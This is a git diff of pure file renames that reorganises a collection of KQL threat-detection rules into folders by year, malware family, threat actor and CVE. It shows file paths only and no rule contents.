KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql rename to KQL/rules-emerging-threats/2020/Malware/FlowCloud/flowcloud_registry_markers.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql b/KQL/rules-emerging-threats/2020/Malware/Ke3chang-TidePool/potential_ke3chang_tidepool_malware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql rename to KQL/rules-emerging-threats/2020/Malware/Ke3chang-TidePool/potential_ke3chang_tidepool_malware_activity.kql 
diff --git a/KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql b/KQL/rules-emerging-threats/2020/Malware/Maze/potential_maze_ransomware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql rename to KQL/rules-emerging-threats/2020/Malware/Maze/potential_maze_ransomware_activity.kql diff --git a/KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql b/KQL/rules-emerging-threats/2020/Malware/Trickbot/trickbot_malware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql rename to KQL/rules-emerging-threats/2020/Malware/Trickbot/trickbot_malware_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql b/KQL/rules-emerging-threats/2020/TA/Evilnum/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql rename to KQL/rules-emerging-threats/2020/TA/Evilnum/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql diff --git a/KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql b/KQL/rules-emerging-threats/2020/TA/GALLIUM/gallium_iocs.kql similarity index 100% rename from KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql rename to KQL/rules-emerging-threats/2020/TA/GALLIUM/gallium_iocs.kql diff --git a/KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql b/KQL/rules-emerging-threats/2020/TA/Greenbug/greenbug_espionage_group_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql rename to KQL/rules-emerging-threats/2020/TA/Greenbug/greenbug_espionage_group_indicators.kql 
diff --git a/KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql b/KQL/rules-emerging-threats/2020/TA/Lazarus/lazarus_group_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql rename to KQL/rules-emerging-threats/2020/TA/Lazarus/lazarus_group_activity.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql b/KQL/rules-emerging-threats/2020/TA/Leviathan/leviathan_registry_key_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql rename to KQL/rules-emerging-threats/2020/TA/Leviathan/leviathan_registry_key_activity.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/suspicious_vbscript_un2452_pattern.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql rename to KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/suspicious_vbscript_un2452_pattern.kql diff --git a/KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_powershell_pattern.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql rename to KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_powershell_pattern.kql diff --git a/KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_process_creation_patterns.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql rename to KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_process_creation_patterns.kql 
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql b/KQL/rules-emerging-threats/2020/TA/TAIDOOR-RAT/taidoor_rat_dll_load.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql rename to KQL/rules-emerging-threats/2020/TA/TAIDOOR-RAT/taidoor_rat_dll_load.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql b/KQL/rules-emerging-threats/2020/TA/Winnti/winnti_malware_hk_university_campaign.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql rename to KQL/rules-emerging-threats/2020/TA/Winnti/winnti_malware_hk_university_campaign.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql b/KQL/rules-emerging-threats/2020/TA/Winnti/winnti_pipemon_characteristics.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql rename to KQL/rules-emerging-threats/2020/TA/Winnti/winnti_pipemon_characteristics.kql diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql 
diff --git a/KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/potential_printnightmare_exploitation_attempt.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/potential_printnightmare_exploitation_attempt.kql diff --git a/KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/printernightmare_mimikatz_driver_name.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/printernightmare_mimikatz_driver_name.kql diff --git a/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/windows_spooler_service_suspicious_binary_load.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/windows_spooler_service_suspicious_binary_load.kql diff --git a/KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26084/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26084/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql 
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26857/potential_cve_2021_26857_exploitation_attempt.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26857/potential_cve_2021_26857_exploitation_attempt.kql diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26858/cve_2021_26858_exchange_exploitation.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26858/cve_2021_26858_exchange_exploitation.kql diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits.kql diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql 
diff --git a/KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-35211/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-35211/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_cve_2021_40444_exploitation_attempt.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_cve_2021_40444_exploitation_attempt.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_exploitation_attempt_from_office_application.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_exploitation_attempt_from_office_application.kql diff --git a/KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/suspicious_word_cab_file_write_cve_2021_40444.kql similarity index 100% rename from KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/suspicious_word_cab_file_write_cve_2021_40444.kql 
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/potential_cve_2021_41379_exploitation_attempt.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/potential_cve_2021_41379_exploitation_attempt.kql diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44077/cve_2021_44077_poc_default_dropped_file.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44077/cve_2021_44077_poc_default_dropped_file.kql diff --git a/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44228/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44228/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql 
diff --git a/KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql b/KQL/rules-emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/suspicious_razerinstaller_explorer_subprocess.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql rename to KQL/rules-emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/suspicious_razerinstaller_explorer_subprocess.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/SystemNightmare-Exploit/potential_systemnightmare_exploitation_attempt.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql rename to KQL/rules-emerging-threats/2021/Exploits/SystemNightmare-Exploit/potential_systemnightmare_exploitation_attempt.kql diff --git a/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql b/KQL/rules-emerging-threats/2021/Malware/BlackByte/blackbyte_ransomware_registry.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql rename to KQL/rules-emerging-threats/2021/Malware/BlackByte/blackbyte_ransomware_registry.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql b/KQL/rules-emerging-threats/2021/Malware/BlackByte/potential_blackbyte_ransomware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql rename to KQL/rules-emerging-threats/2021/Malware/BlackByte/potential_blackbyte_ransomware_activity.kql 
diff --git a/KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql b/KQL/rules-emerging-threats/2021/Malware/Conti/conti_ntds_exfiltration_command.kql similarity index 100% rename from KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql rename to KQL/rules-emerging-threats/2021/Malware/Conti/conti_ntds_exfiltration_command.kql diff --git a/KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql b/KQL/rules-emerging-threats/2021/Malware/Conti/conti_volume_shadow_listing.kql similarity index 100% rename from KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql rename to KQL/rules-emerging-threats/2021/Malware/Conti/conti_volume_shadow_listing.kql diff --git a/KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql b/KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql rename to KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_activity.kql diff --git a/KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql b/KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql similarity index 100% rename from KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql rename to KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql diff --git a/KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql b/KQL/rules-emerging-threats/2021/Malware/DarkSide/darkside_ransomware_pattern.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql rename to KQL/rules-emerging-threats/2021/Malware/DarkSide/darkside_ransomware_pattern.kql 
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql b/KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_malware_reconnaissance.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql rename to KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_malware_reconnaissance.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql b/KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_related_indicator.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql rename to KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_related_indicator.kql diff --git a/KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql b/KQL/rules-emerging-threats/2021/Malware/FoggyWeb/foggyweb_backdoor_dll_loading.kql similarity index 100% rename from KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql rename to KQL/rules-emerging-threats/2021/Malware/FoggyWeb/foggyweb_backdoor_dll_loading.kql diff --git a/KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/goofy_guineapig_backdoor_ioc.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql rename to KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/goofy_guineapig_backdoor_ioc.kql 
diff --git a/KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_backdoor_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql
rename to KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_backdoor_activity.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql
rename to KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql
diff --git a/KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql b/KQL/rules-emerging-threats/2021/Malware/Moriya-Rootkit/moriya_rootkit_file_created.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql
rename to KQL/rules-emerging-threats/2021/Malware/Moriya-Rootkit/moriya_rootkit_file_created.kql
diff --git a/KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql b/KQL/rules-emerging-threats/2021/Malware/Netwire/potential_netwire_rat_activity_registry.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql
rename to KQL/rules-emerging-threats/2021/Malware/Netwire/potential_netwire_rat_activity_registry.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql
rename to KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_activity.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_dll_loading_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql
rename to KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_dll_loading_activity.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_file_indicators.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql
rename to KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_file_indicators.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_commandline_indicator.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql
rename to KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_commandline_indicator.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_file_indicator_creation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql
rename to KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_file_indicator_creation.kql
diff --git a/KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_registry_persistence.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql
rename to KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_registry_persistence.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql b/KQL/rules-emerging-threats/2021/TA/HAFNIUM/hafnium_exchange_exploitation_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql
rename to KQL/rules-emerging-threats/2021/TA/HAFNIUM/hafnium_exchange_exploitation_activity.kql
diff --git a/KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql b/KQL/rules-emerging-threats/2021/TA/Kaseya-Supply-Chain/revil_kaseya_incident_malware_patterns.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql
rename to KQL/rules-emerging-threats/2021/TA/Kaseya-Supply-Chain/revil_kaseya_incident_malware_patterns.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql b/KQL/rules-emerging-threats/2021/TA/PRIVATELOG/apt_privatelog_image_load_pattern.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql
rename to KQL/rules-emerging-threats/2021/TA/PRIVATELOG/apt_privatelog_image_load_pattern.kql
diff --git a/KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql b/KQL/rules-emerging-threats/2021/TA/SOURGUM/sourgum_actor_behaviours.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql
rename to KQL/rules-emerging-threats/2021/TA/SOURGUM/sourgum_actor_behaviours.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-21554/potential_cve_2023_21554_queuejumper_exploitation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql
rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-21554/potential_cve_2023_21554_queuejumper_exploitation.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-22954/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql
rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-22954/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql
diff --git a/KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-24527/cve_2022_24527_microsoft_connected_cache_lpe.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql
rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-24527/cve_2022_24527_microsoft_connected_cache_lpe.kql
diff --git a/KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26134/atlassian_confluence_cve_2022_26134.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql
rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26134/atlassian_confluence_cve_2022_26134.kql
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26809/potential_cve_2022_26809_exploitation_attempt.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql
rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26809/potential_cve_2022_26809_exploitation_attempt.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-29072/potential_cve_2022_29072_exploitation_attempt.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql
rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-29072/potential_cve_2022_29072_exploitation_attempt.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-30190/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql
rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-30190/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql
diff --git a/KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-33891/apache_spark_shell_command_injection_processcreation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql
rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-33891/apache_spark_shell_command_injection_processcreation.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-41120/suspicious_sysmon_as_execution_parent.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql
rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-41120/suspicious_sysmon_as_execution_parent.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql b/KQL/rules-emerging-threats/2022/Malware/ChromeLoader/chromeloader_malware_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql
rename to KQL/rules-emerging-threats/2022/Malware/ChromeLoader/chromeloader_malware_execution.kql
diff --git a/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql b/KQL/rules-emerging-threats/2022/Malware/Emotet/emotet_loader_execution_via_lnk_file.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql
rename to KQL/rules-emerging-threats/2022/Malware/Emotet/emotet_loader_execution_via_lnk_file.kql
diff --git a/KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql b/KQL/rules-emerging-threats/2022/Malware/Hermetic-Wiper/hermetic_wiper_tg_process_patterns.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql
rename to KQL/rules-emerging-threats/2022/Malware/Hermetic-Wiper/hermetic_wiper_tg_process_patterns.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/potential_raspberry_robin_dot_ending_file.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql
rename to KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/potential_raspberry_robin_dot_ending_file.kql
diff --git a/KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_initial_execution_from_external_drive.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql
rename to KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_initial_execution_from_external_drive.kql
